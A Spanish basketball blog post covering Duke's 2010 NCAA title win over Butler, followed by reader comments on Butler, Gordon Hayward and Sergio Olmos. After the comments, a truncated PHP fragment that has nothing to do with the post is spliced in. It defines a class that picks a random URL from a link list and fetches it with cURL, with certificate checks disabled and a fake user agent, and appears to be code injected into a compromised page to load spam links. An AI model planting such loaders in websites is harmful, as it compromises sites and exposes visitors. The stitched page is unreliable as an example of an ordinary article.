Duke, campeón de la NCAA

07 de April de 2010 por txusma

Y la fabulosa historia de la cenicienta llegó a su fin. La humilde universidad de Butler no consiguió completar su guión cinematográfico por escasos centimetros, los que evitaron que el buzzer-beater de Gordon Hayward, lanzado desde el medio del campo, hiciera diana. Los jugadores de Butler debieron quedar hundidos tras la derrota pero situaron a su universidad en el centro del mapa mediático del país durante los 3 días de la Final Four y hasta el último segundo. Hay para estar orgullosos.

Los últimos compases de la historia se iniciaron dos días antes, en las semifinales. Duke cumplió sobradamente su papel de favorita y masacró a una West Virginia que se quedó sin su máximo anotador, Da’Sean Butler, al principio de la segunda parte. La lesión de su mejor hombre, que se destrozó literalmente la rodilla y que ve seriamente comprometida su carrera profesional, acabó de hundir a los Mountaineers que nada pudieron hacer ante Singler, Scheyer, Smith y compañía.

Por su parte, los Butler Bulldogs incluyeron a Michigan State en su lista de equipos apeados en esta March Madness al lado de otros como Kansas, Kentucky o Syracuse, casi nada. Jugando en casa y de la mano de Gordon Hayward, autor de 19 puntos y 9 rebotes, se impusieron a los Spartans a partir de una gran defensa y una fe inquebrantable. El guión parecía escribirse en renglones perfectamente alineados.

Duke eran los máximos favoritos pero enfrente tenían un grupo de auténticos guerreros empujados por casi 70.000 almas. Si querían ganar, tendrían que sudar y sufrir, y vaya si lo hicieron. Su defensa también fue de libro, dejando a los Bulldogs en un 34% de acierto en el tiro y atacando con su misma fe y tenacidad. El partido fue a cara de perro en todo momento y llegó igualado hasta el final con Duke 5 arriba a menos de 2 minutos. Mientras todos los Bulldogs apretaron los dientes y evitaron una canasta de los jugadores de Duke, Matt Howard conseguía 4 puntos que situaban al equipo a una sola canasta de la victoria. Gordon Hayward falló a falta de 9 segundos un primer intento de canasta ganadora y volvió a fallar sobre la bocina viendo como se esfumaba de un plumazo uno de los mayores sueños de los últimos años. Punto y final  a una gran March Madness.

Comenta

6 comentarios a esta entrada

  1. Love Denise dice:
    #1

    Buen artículo txusma, gracias a ti y a kantonyo cada día sé más cosas de la NCAA, aunque mi conocimiento sobre este campeonato es todavía muy pobre para poder opinar.
    por cierto, nunca he visto jugar a Sergio Olmos, que actualmente está en la Leb. Alguién cree que puede ser al menos un buen pivot en Europa? tengo un amigo que le ha visto jugar en la NCAA que dice que es un paquete tipo PJ Ramos y que lo unico que tiene es altura., ásí que me gustaría que me dieseis vuestra opinión, gracias.

      Citar

  2. Dantley2 dice:
    #2

    Cuanto más pase el tiempo más se valorará lo de Butler.

    Por cierto, para mí Hayward no es NBA. Por decir uno, me parece más jugador Hansbrough y le falta para ser NBA. Eso sí, sería un interesante complemento en un ACB

      Citar

  3. kantonyo dice:
    #3

    El año pasado segui un poco estadisticamente a Sergio Olmos, por eso de ser español, pero no pude ver muchos minutos en directo. Se clasificó con Temple para el March Madness desde una conferencia de nivel medio y fueron eliminados en primera ronda. Yo creo que siendo optimista podría ser un pívot títular en un equipo de tabla baja en la ACB.

    Lo de Butler la verdad es que ha tenido muchísimo mérito, ha tenido unos emparejamientos dificilisimos y sólo unos centimetros les ha dejado sin el campeonato.

    Gordon Hayward en este momento está muy verde para jugar en la NBA, pero puede ser un buen jugador en el futuro. Puede que la solución está en que pruebe suerte en Europa, pero si es elegido en el draft, deben darle paso poco a poco, debe ganar físico y mejorar su tiro exterior. Es un caso parecido a Austin Daye, para mi un jugador con un talento enorme y que en Detroit lo están soltando a cuentagotas, ayer en cambio fue titular y no lo hizo nada mal en la victoria sobre Hawks.

      Citar

  4. Love Denise dice:
    #4

    gracias kantonyo por responder, o sea, que, a priori, Olmos nunca va a estar en un grande, ni jugará la Euroliga,
    ok.

      Citar

  5. kantonyo dice:
    #5

    Hombre, podría jugar la euroliga o estar en un grande, como jugador secundario o si progresa y hace buen uso de su altura y envergadura ser incluso mas importante, ya que jugadores altos en la acb no es que sobren. Pero vamos repito no es un jugador que haya seguido mucho para tener una opinión sobre él, hasta el momento su progresión no ha sido la esperada.

      Citar

  6. sergio dice:
    #6

    No os he dicho nada pero segui la final y me pareció un partido apasionante. El nivel esta claro que no es el de jugadores NBA, pero igual de claro me parece que no lo necesitan para crear sensaciones desconocidas en la liga profesional americana hasta bien entrados los Playoffs. Magnifico ambiente en Indiana, estado baloncestistico por antonomasia. Lastima que los Hoosiers 2010 no consiguieran llevarse el gato al agua.

    Sinceramente, si no hubieseis sacado estos articulos entre Kantonyo y Txus… dudo q hubiese hecho un seguimiento de la NCAA al nivel que lo he hecho este año. Mis felicitaciones

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>